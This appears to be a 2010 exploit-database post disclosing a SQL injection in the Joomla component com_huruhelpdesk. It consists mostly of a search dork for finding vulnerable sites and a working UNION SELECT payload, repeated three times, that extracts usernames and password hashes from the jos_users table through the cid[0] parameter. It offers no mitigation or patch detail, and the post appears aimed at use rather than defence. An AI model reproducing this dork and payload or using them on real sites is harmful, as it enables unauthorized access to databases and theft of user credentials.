Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability
# Published : 2010-07-23
# Author : Amine_92
# Previous Title : PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability
# Next Title : Joomla Component (com_iproperty) SQL Injection Vulnerability

====================================================
Joomla Component com_huruhelpdesk SQL Injection Vulnerability
===================================================

Author :   Amine_92
Email  : [amine92_16@hotmail.fr]
Homepage : { www.vbhacker.net/vb }
DORK    :  inurl:"index.php?option=com_huruhelpdesk"
===================================================

[+] Vulnerable File :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=[SQL]

[+] ExploiT :
-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

[+] Example :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--
[+] Demo :
http://www.Victime.com/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+from+jos_users--

====================================================
Thank's to :awras,italiano_capilo & all my friends